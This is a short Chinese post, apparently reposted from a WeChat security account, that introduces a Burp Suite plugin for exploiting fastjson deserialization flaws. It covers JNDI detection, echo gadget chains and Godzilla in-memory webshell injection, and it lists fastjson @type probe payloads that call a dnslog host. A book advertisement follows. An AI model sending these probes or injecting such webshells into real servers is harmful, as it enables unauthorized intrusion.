===================================
0x01 工具介绍
fastjson利用,burp插件。支持出网 jndi利用检测,不出网 tomcat、spring回显,哥斯拉内存马,回显利用链为dhcp、ibatis、c3p0,内存马支持tomcat89。
0x02 安装与使用
1、加载到burp插件,自行选择echo、jndi、inject。探测存在后,发送Repeater自行修改请求头,回显在响应头。如下
2、测试环境
tomcat启动后,将war包放在webapps目录即(tomcat自带dhcp依赖),漏洞环境为1.2.24和1.2.47。
3、判断是否使用fastjon组件
4、点击 新增策略,通过增加策略来增加漏洞类型
dns ● {"@type":"java.net.Inet4Address","val":"dnslog"}● {"@type":"java.net.Inet6Address","val":"dnslog"}● {"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}● {{"@type":"java.net.URL","val":"http://dnslog"}:0● {"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}● Set[{"@type":"java.net.URL","val":"http://dnslog"}]
0x03 项目链接下载
· 今 日 送 书 ·
算法设计与分析——基于C++编程语言的描述
京东购买链接:https://item.jd.com/13795546.html
本书注重理论与实践紧密结合,系统介绍算法设计方法、分析技巧和 C++ 编程实战。作者本着“易理解,重实用”的指导思想,结合多年的教学经验,以算法设计策略为主线,沿着“算法思想—算法设计—构造实例—算法描述—算法分析—C++实战”的思路组织学习内容,共包括算法及基础知识、贪心法、分治法、动态规划、搜索法、随机化算法、线性规划问题与网络流、数论算法及计算几何算法和 NP完全理论等9章内容。
文章来源: http://mp.weixin.qq.com/s?__biz=MzI4MDQ5MjY1Mg==&mid=2247507821&idx=1&sn=1d8b61712912ccecac4fc939fc04b8fe&chksm=ebb5306edcc2b97860305009097179424a7a619aee3d1a54a52e5e9b775714e999eea44111c0#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh